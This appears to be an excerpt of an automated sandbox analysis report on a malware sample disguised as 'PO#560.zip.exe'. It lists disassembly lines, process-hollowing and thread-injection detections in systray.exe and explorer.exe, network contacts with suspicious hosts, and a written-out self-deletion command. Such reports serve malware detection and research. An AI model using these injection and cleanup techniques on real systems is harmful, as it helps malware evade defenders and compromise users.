          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_049F20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_049C58EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_04A5B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_04A5B8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_04A5B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_04A5B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_04A5B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_04A5B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_049C40E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_049C40E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_049C40E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_04A47016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_04A47016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_04A47016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_049F002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_049F002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_049F002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_049F002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_049F002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_049DB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_049DB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_049DB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_049DB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_04A94015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_04A94015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_049E0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_049E0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_04A82073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_04A91074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_04A469A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_04A849A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_04A849A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_04A849A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_04A849A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_049F2990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_049FA185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_04A451BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_04A451BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_04A451BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_04A451BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_049EC182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_049F61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_049F61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_04A541E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_049CB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_049CB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_049CB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_049C9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_049C9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_049C9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_049F513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_049F513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_049E4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_049E4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_049E4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_049E4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_049E4120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_049EB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_049EB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_049CB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_049CB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_049CC962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_049FD294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_049FD294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_049DAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_049DAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_049FFAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_049C52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_049C52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_049C52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_049C52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_049C52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_049F2ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_049F2AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_049E3A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_049CAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_049CAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_04A04A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_04A04A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_049C5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_049C5210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_049C5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_049C5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_049D8A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_04A8AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_04A8AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_04A7B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_04A7B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_04A98A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_04A0927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_049C9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_049C9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_049C9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_049C9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_04A54257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_04A8EA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_049F2397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_04A95BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_049FB390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_049D1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_049D1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_04A8138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_04A7D380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_049F4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_049F4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_049F4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_04A453CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_04A453CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_049EDBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_049F03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_049F03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_049F03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_049F03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_049F03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_049F03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_04A8131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_049CF358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_049CDB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_049F3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_049F3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_04A98B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 10_2_049CDB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO#560.zip.exeProcess token adjusted: Debug
          Source: C:\Users\user\Desktop\PO#560.zip.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\systray.exeProcess token adjusted: Debug
          Source: C:\Users\user\Desktop\PO#560.zip.exeMemory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeNetwork Connect: 151.101.1.211 80
          Source: C:\Windows\explorer.exeNetwork Connect: 50.118.194.26 80
          Source: C:\Windows\explorer.exeDomain query: www.mymoxypets.com
          Source: C:\Windows\explorer.exeDomain query: www.new123movies.pro
          Source: C:\Windows\explorer.exeNetwork Connect: 185.53.177.14 80
          Source: C:\Windows\explorer.exeDomain query: www.talllensphotography.com
          Injects a PE file into a foreign processesShow sources
          Source: C:\Users\user\Desktop\PO#560.zip.exeMemory written: C:\Users\user\Desktop\PO#560.zip.exe base: 400000 value starts with: 4D5A
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\Desktop\PO#560.zip.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\PO#560.zip.exeSection loaded: unknown target: C:\Windows\SysWOW64\systray.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\PO#560.zip.exeSection loaded: unknown target: C:\Windows\SysWOW64\systray.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\systray.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\systray.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\PO#560.zip.exeThread register set: target process: 3388
          Source: C:\Windows\SysWOW64\systray.exeThread register set: target process: 3388
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\PO#560.zip.exeThread APC queued: target process: C:\Windows\explorer.exe
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\user\Desktop\PO#560.zip.exeSection unmapped: C:\Windows\SysWOW64\systray.exe base address: C50000
          Source: C:\Users\user\Desktop\PO#560.zip.exeProcess created: C:\Users\user\Desktop\PO#560.zip.exe {path}
          Source: C:\Windows\SysWOW64\systray.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\PO#560.zip.exe'
          Source: explorer.exe, 00000005.00000002.479927551.0000000001398000.00000004.00000020.sdmpBinary or memory string: ProgmanamF
          Source: explorer.exe, 00000005.00000002.481518579.0000000001980000.00000002.00000001.sdmp, systray.exe, 0000000A.00000002.480606169.0000000003250000.00000002.00000001.sdmpBinary or memory string: Program Manager
          Source: explorer.exe, 00000005.00000000.261169772.000000000871F000.00000004.00000001.sdmp, systray.exe, 0000000A.00000002.480606169.0000000003250000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000005.00000002.481518579.0000000001980000.00000002.00000001.sdmp, systray.exe, 0000000A.00000002.480606169.0000000003250000.00000002.00000001.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000005.00000002.481518579.0000000001980000.00000002.00000001.sdmp, systray.exe, 0000000A.00000002.480606169.0000000003250000.00000002.00000001.sdmpBinary or memory string: Progmanlock
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Users\user\Desktop\PO#560.zip.exe VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#560.zip.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
